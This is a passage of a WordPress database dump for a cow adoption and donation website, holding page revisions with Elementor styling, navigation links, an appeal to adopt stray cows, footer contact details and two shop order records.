icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:23:03','2022-10-20 12:53:03','',1373,'https://gopalak.in/?p=1986',0,'revision','',0),(1988,1,'2022-10-27 17:35:26','2022-10-27 12:05:26','','Order &ndash; October 27, 2022 @ 05:35 PM','','wc-processing','open','closed','wc_order_MK1bMc5HidQrI','order-oct-27-2022-1205-pm','','','2022-10-27 17:54:18','2022-10-27 12:24:18','',0,'https://gopalak.in/?post_type=shop_order&#038;p=1988',0,'shop_order','',2),(1989,1,'2022-10-28 09:38:19','2022-10-28 04:08:19','','Order &ndash; October 28, 2022 @ 09:38 AM','','wc-processing','open','closed','wc_order_nfomStFNJjVRz','order-oct-28-2022-0408-am','','','2022-10-28 09:39:27','2022-10-28 04:09:27','',0,'https://gopalak.in/?post_type=shop_order&#038;p=1989',0,'shop_order','',3),(1990,1,'2022-10-28 10:34:15','2022-10-28 05:04:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 10:34:15','2022-10-28 05:04:15','',1816,'https://gopalak.in/?p=1990',0,'revision','',0),(1991,1,'2022-10-28 10:34:15','2022-10-28 05:04:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 10:34:15','2022-10-28 05:04:15','',1816,'https://gopalak.in/?p=1991',0,'revision','',0),(1992,1,'2022-10-28 10:34:15','2022-10-28 05:04:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" 